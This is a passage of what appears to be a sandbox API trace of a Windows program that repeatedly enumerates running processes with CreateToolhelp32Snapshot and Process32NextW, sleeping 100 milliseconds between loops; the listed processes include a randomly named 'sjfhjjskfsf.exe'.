lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0223.305] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.306] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0223.306] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.306] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0223.306] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0223.307] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0223.307] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0223.307] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.308] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.308] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.308] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.308] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.309] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0223.309] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.309] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.310] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0223.310] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.310] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0223.310] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0223.311] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.311] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0223.311] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0223.311] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0223.312] Process32NextW (in: hSnapshot=0x264, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0223.312] Sleep (dwMilliseconds=0x64) [0223.406] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x268 [0223.408] Process32FirstW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.408] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0223.409] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0223.409] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.409] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0223.410] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.410] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0223.410] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0223.410] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0223.411] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0223.411] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.411] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.412] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.412] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.412] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.412] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0223.413] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.413] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.413] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0223.414] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.414] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0223.414] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0223.414] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.415] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0223.415] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0223.415] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0223.416] Process32NextW (in: hSnapshot=0x268, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0223.416] Sleep (dwMilliseconds=0x64) [0223.547] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x26c [0223.548] Process32FirstW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.549] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0223.549] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0223.549] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.549] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0223.550] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.550] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0223.550] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0223.550] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0223.551] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0223.551] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.551] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.552] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.552] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.552] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.552] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0223.553] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.553] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.553] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0223.554] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.554] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0223.554] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0223.554] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.555] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0223.555] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0223.555] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0223.556] Process32NextW (in: hSnapshot=0x26c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0223.556] Sleep (dwMilliseconds=0x64) [0223.667] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x270 [0223.673] Process32FirstW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.673] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0223.674] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0223.674] Process32NextW (in: hSnapshot=0x270, lppe=0x18ebc4 | out: 